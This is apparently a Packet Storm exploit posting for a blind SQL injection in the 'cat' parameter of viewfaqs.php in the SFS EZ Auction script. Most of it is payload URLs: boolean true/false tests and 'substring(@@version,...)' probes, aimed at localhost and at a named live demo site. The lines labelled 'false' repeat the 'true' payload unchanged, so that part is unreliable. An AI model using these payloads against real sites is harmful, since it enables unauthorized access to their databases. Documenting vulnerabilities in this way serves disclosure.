SFS EZ Auction suffers from a blind SQL injection vulnerability in viewfaqs.php.
087dc368b5740e04821eda65f09149a4e8bce8a52e4c7e4a0a6869c5fd4c1406###########################################################################
# Kira has decide be back after halloween
###########################################################################
# Discovered by : Mountassif Moad
# Type Gap : Blind Sql Injection
# Script : SFS EZ Auction Remote Blind sql injection
# Home Script : http://www.scripts-for-sites.info/item.php?item=97
# Greetz : Allah , All my freind
##########################################################################
P0c :
http://localhost/viewfaqs.php?cat=1+and+1=1 true
http://localhost/viewfaqs.php?cat=1+and+1=1 false
http://phpauctions.info/demo/viewfaqs.php?cat=1+and+1=1 true
http://phpauctions.info/demo/viewfaqs.php?cat=1+and+1=1 false
Exploit :
http://localhost/viewfaqs.php?cat=1+and+1=1+and+substring(@@version,1,1)=5
http://localhost/viewfaqs.php?cat=1+and+1=1+and+substring(@@version,1,1)=4
Demo :
http://phpauctions.info/demo/viewfaqs.php?cat=1+and+1=1+and+substring(@@version,1,1)=5
http://phpauctions.info/demo/viewfaqs.php?cat=1+and+1=1+and+substring(@@version,1,1)=4
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed